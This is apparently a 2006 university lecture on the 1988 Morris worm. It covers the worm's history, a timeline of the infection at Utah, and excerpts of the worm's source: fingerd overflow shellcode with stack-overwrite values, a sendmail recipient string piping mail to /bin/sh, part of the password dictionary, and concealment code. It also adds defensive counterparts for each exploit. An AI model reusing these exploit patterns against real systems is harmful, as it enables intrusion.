The Internet Worm of 1988 Svetlana V. Drachova-Strang Clemson University CPSC 681 April 25, 2006 “...
The Internet Worm of 1988
Svetlana V. Drachova-Strang, Clemson University
CPSC 681, April 25, 2006
“There may be a virus loose on the internet” (Andy Sudduth of Harvard, 34 minutes after midnight, Nov. 3, 1988)
Creator and His Creation
November 2nd, 1988: Robert Tappan Morris, a 23-year-old CS student from Cornell, released a worm from MIT.
Aside: he is the son of Robert Morris, Sr., Chief Scientist at the National Computer Security Center, a subdivision of the NSA.
The Morris worm consisted of several files of cleverly written C code.
Intentions: probe the size of the Internet with a self-replicating program?
Effects: Internet down; thousands of machines disconnected from the Internet; worm on the loose.
What the worm DID NOT do:
Did not cause physical damage to computer systems.
Did not alter or destroy system or user files
Did not affect machines running OSs other than VAX or BSD Unix
Did not save or transmit the cracked passwords
Did not attempt to gain superuser access
Did not plant any trojans or timebombs
Did not attack machines that were not attached to the internet
What the worm DID:
Self-propagated through Internet infecting and reinfecting machines
Self-replicated unstoppably
Exploited several vulnerabilities: fingerd, sendmail, passwords
Had flaws that made it especially destructive, and/or impaired the intended functionality
Cracked user passwords
Disguised itself by several clever means
History and Origins
“Worms were good at first”: noble usage
1975: the “tapeworm” in John Brunner’s The Shockwave Rider
Early 1980s: John Shoch and Jon Hupp created five worms for executing helpful tasks on the internet (billboard worm, vampire worm, etc.): “a useful way to run distributed diagnostics”
Mishap, and the first lesson learned
Conclusions
We have the tools at hand to experiment with distributed computations in their fullest form: dynamically allocating resources and moving from machine to machine. Furthermore, local networks supporting relatively large numbers of hosts now provide a rich environment for this kind of experimentation. The basic worm programs described here demonstrate the ease with which these mechanisms can be explored… (J. Shoch, J. Hupp)
The Horrible Night
6:00 PM: The Worm is launched
8:49 PM: The Worm infects a VAX-8600 at the University of Utah
9:09 PM: The Worm initiates the first attack to infect others
9:21 PM: Load average on the system reaches 5 (should be 1)
9:41 PM: Load average reaches 7
10:01 PM: Load average reaches 16
10:06 PM: No new processes can be started; system unusable
10:20 PM: System administrator kills off the worms
10:41 PM: System is reinfected; load average reaches 27
10:49 PM: System administrator shuts down and restarts the system
11:21 PM: Reinfestation causes load average to reach 37
fingerd Vulnerability Exploited
fingerd reads its request into a 512-character buffer.
The worm calls write() with a 536-character argument plus a newline. The last 6 words overwrite the stack frame, including the return PC, so that when the routine returns it executes a system-call version of execve("/bin/sh"), which installs the worm on the target system.
```c
char buf[536] = "\335\217/sh\0\335\217/bin\320^Z\335\0\335\0\335Z\335\003 \320^\\\274;\344\371\344\342\241\256\343\350\357\256\362\351";

/* Rewrite part of the stack frame */
l556 = 0x7fffe9fc;
l560 = 0x7fffe8a8;
l564 = 0x7fffe8bc;
l568 = 0x28000000;
l552 = 0x0001c020;
#ifdef sun /* Reverse the word order for the Sun machines */
l556 = byte_swap(l556);
l560 = byte_swap(l560);
l564 = byte_swap(l564);
l568 = byte_swap(l568);
l552 = byte_swap(l552);
#endif /* sun */

write(s, buf, sizeof(buf)); /* sizeof == 536 */
write(s, XS("\n"), 1);
sleep(5);
if (test_connection(s, s, 10)) {
    *fd1 = s;
    *fd2 = s;
    return 1;
}
```
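The defensive counterpart to the overflow above, as an added example that is not code from the slides or from the worm: the 1988 fingerd read its one-line request with gets() into a fixed 512-byte stack buffer, so the 536-byte line ran past the buffer into the saved registers and return PC. This bounded reader keeps the same 512-byte buffer but accepts only a request that ends in a newline within that limit; the function names and the probe() helper are assumptions for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not from the slides or the worm source: a bounded
 * replacement for the gets() call in the 1988 fingerd. The buffer stays
 * 512 bytes, but input is copied only up to the first newline and only
 * if that newline appears inside the buffer. */
#define REQ_MAX 512

/* Copy one request line from a received byte stream into buf.
 * Returns the request length (without the newline) on success, or -1 if
 * no newline appears within the first REQ_MAX bytes: an over-long request
 * is rejected whole rather than truncated or spilled onto the stack. */
int read_request(const char *data, size_t len, char buf[REQ_MAX]) {
    size_t limit = len < REQ_MAX ? len : REQ_MAX;
    for (size_t i = 0; i < limit; i++) {
        if (data[i] == '\n') {
            memcpy(buf, data, i);   /* i <= REQ_MAX-1, so the NUL fits */
            buf[i] = '\0';
            return (int)i;
        }
    }
    buf[0] = '\0';
    return -1;
}

/* Constructed input for testing: n filler bytes plus a newline, the same
 * shape as the worm's 536-byte line (the real one carried VAX code).
 * Returns what read_request() returns, or -2 if n is too large to build. */
int probe(size_t n) {
    char data[600];
    char buf[REQ_MAX];
    if (n + 1 > sizeof data) return -2;
    memset(data, 'A', n);
    data[n] = '\n';
    return read_request(data, n + 1, buf);
}
```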
sendmail Vulnerability Exploited
TCP-level flaw: the DEBUG flag allows mail to be sent to a process instead of a user.
The worm sends a message with the DEBUG flag to a cleverly built recipient.
The recipient string sets up a command that deletes the header and passes the body to the command interpreter. That compiles code which opens a connection and fetches a copy of the worm.
```c
#define MAIL_FROM "mail from:</dev/null>\n"
#define MAIL_RCPT "rcpt to:<\"| sed \'1,/^$/d\' | /bin/sh ; exit 0\">\n"

send_text(s, XS(MAIL_FROM));
sprintf(l548, XS(MAIL_RCPT), i, i);
send_text(s, l548);
send_text(s, XS("data\n"));
compile_slave(host, s, saddr);
send_text(s, XS("\n.\n"));
send_text(s, XS("quit\n"));
```
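A recipient check for the SMTP exchange above, as an added example that is not code from the slides or from sendmail: whatever the DEBUG setting, a mailer should never accept a recipient whose local part is a quoted shell pipeline. The function accepts only a plain mailbox name inside the angle brackets; the function name and the accepted character set are assumptions for illustration.

```c
#include <string.h>
#include <strings.h>
#include <ctype.h>

/* Added example, not from the slides or sendmail: validate one "rcpt to:"
 * line so that program delivery ("| ...") can never be requested from the
 * network. Only letters, digits, '.', '-', '_' and '@' are allowed in the
 * path; a quote, pipe, space or semicolon rejects the whole line. */
int rcpt_is_plain_mailbox(const char *line) {
    const char *p = line, *end;
    /* SMTP commands are case-insensitive; strncasecmp is POSIX. */
    if (strncasecmp(p, "rcpt to:", 8) != 0) return 0;
    p += 8;
    while (*p == ' ') p++;
    if (*p++ != '<') return 0;
    end = strchr(p, '>');
    if (!end || end == p) return 0;             /* unterminated or empty path */
    for (; p < end; p++) {
        unsigned char c = (unsigned char)*p;
        if (isalnum(c) || c == '.' || c == '-' || c == '_' || c == '@') continue;
        return 0;                               /* quote, pipe, space, ';', ... */
    }
    return 1;
}
```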
Password Cracking
Exploited 2 vulnerabilities:
System: /etc/passwd file
User: weak passwords
Attack has 4 stages:
0: seek other machines to infect from /etc/hosts.equiv and /.rhosts
1: obvious password guesses (35% success)
2: worm’s internal dictionary
3: system’s online dictionary in /usr/dict/words
Worm’s dictionary
```c
char *wds[] = /* 0x21a74 */
{"academia", "aerobics", "airplane", "albany", "albatross", "albert", "alex", "alexander", "algebra", "aliases", "alphabet", "amorphous", "analog", "anchor", "andromache", "animals", "answer", "anthropogenic", "anvils", "anything", "aria", "ariadne", "arrow", "arthur", "athena", "atmosphere", "aztecs", "azure", "bacchus", "bailey", "banana", "bananas", "bandit", "banks", "barber", "baritone", "bass", "bassoon", "batman", "beater", "beauty", "beethoven", "beloved", "benz", "beowulf", "berkeley", "berliner", "beryl", "beverly", "bicameral", "brenda", "brian", "bridget", "broadway", "bumbling", "burgess", "campanile", "cantor", "cardinal",
. . . "tarragon", "taylor", "telephone", "temptation", "thailand", "tiger", "toggle", "tomato", "topography", "tortoise", "toyota", "trails", "trivial", "trombone", "tubas", "tuttle", "umesh", "unhappy", "unicorn", "unknown", "urchin", "utility", "vasant", "vertigo", "vicky", "village", "virginia", "warren", "water", "weenie", "whatnot", "whiting", "whitney", "will", "william", "williamsburg", "willie", "winston", "wisconsin", "wizard", "wombat", "woodwind", "wormwood", "yacov", "yang", "yellowstone", "yosemite", "zimmerman", 0
};
/* contained 421 words */
```
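The four-stage attack and the dictionary above turned into a defensive check, as an added example that is not code from the slides or from the worm: a password-setting routine that replays stage 1 and stage 2 against a candidate password and refuses anything the worm would have guessed. The stage-1 guesses (empty, login name, login name doubled, first name, last name, last name reversed) follow the 1988 analyses of the worm; the dictionary is a constructed 8-word sample of the 421-word list, and lower-casing the guesses is a choice made here.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Added example, not from the slides or the worm source. Constructed
 * 8-word sample standing in for the worm's 421-word internal dictionary. */
static const char *sample_dict[] = {
    "academia", "beowulf", "berkeley", "wizard", "wombat",
    "yellowstone", "yosemite", "zimmerman", 0
};

/* Lower-case copy of src into dst, which holds n bytes. */
static void lower_copy(char *dst, const char *src, size_t n) {
    size_t i;
    for (i = 0; i + 1 < n && src[i]; i++) dst[i] = (char)tolower((unsigned char)src[i]);
    dst[i] = '\0';
}

static void reverse(char *s) {
    for (size_t i = 0, j = strlen(s); i + 1 < j; i++, j--) {
        char t = s[i]; s[i] = s[j - 1]; s[j - 1] = t;
    }
}

/* Returns 0 if pw survives both stages, 1 if a stage-1 "obvious" guess
 * matches, 2 if a dictionary word matches. gecos is the "First Last"
 * name field from the password file entry. */
int worm_would_guess(const char *user, const char *gecos, const char *pw) {
    char guess[6][64], first[64] = "", last[64] = "";
    const char *sp = strchr(gecos, ' ');
    lower_copy(first, gecos, sp ? (size_t)(sp - gecos) + 1 : sizeof first);
    if (sp) lower_copy(last, sp + 1, sizeof last);
    guess[0][0] = '\0';                                   /* no password */
    lower_copy(guess[1], user, sizeof guess[1]);          /* login name */
    snprintf(guess[2], sizeof guess[2], "%s%s", guess[1], guess[1]); /* doubled */
    strcpy(guess[3], first);                              /* first name */
    strcpy(guess[4], last);                               /* last name */
    strcpy(guess[5], last); reverse(guess[5]);            /* last name reversed */
    for (int i = 0; i < 6; i++)
        if (strcmp(pw, guess[i]) == 0) return 1;
    for (const char **w = sample_dict; *w; w++)
        if (strcmp(pw, *w) == 0) return 2;
    return 0;
}
```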
Concealing Itself
Renamed itself to sh, which is also the name of the Bourne shell:
```c
strcpy(argv[0], XS("sh"));
```
Set the core dump size to zero:
```c
rl.rlim_cur = 0;
rl.rlim_max = 0;
if (setrlimit(RLIMIT_CORE, &rl))
    ;
```
Deleted its parent process and manipulated its process ID
Used encryption
Oops, … The Worm Had Flaws
Major flaws in the program code:
Only a ≈14% chance that the worm will check whether the target system has already been infected
A 1 in 7 chance (instead of 1 in 10,000) that a listening worm will not listen for a pleasequit() signal
Called sendto() on a TCP socket instead of a UDP socket when sending 1 byte of data from each machine to the originating Berkeley machine 128.32.137.13, port 11357
There were other flaws as well
Worm Map
[from http://snowplow.org/tom/worm/history.html]
Complex Logic of the Worm
Lessons Learned
The Morris Worm was the first worm to bring the Internet down.
A worm is a powerful tool capable of inflicting a lot of damage.
Computer crime is punishable under the Computer Fraud and Abuse Act of 1986.
Later Mr. Morris himself stated that the incident “has raised the public awareness to a considerable degree” [R. H. Morris, quoted in the New York Times, 11/5/88].
System administrators increased their efforts in protecting their systems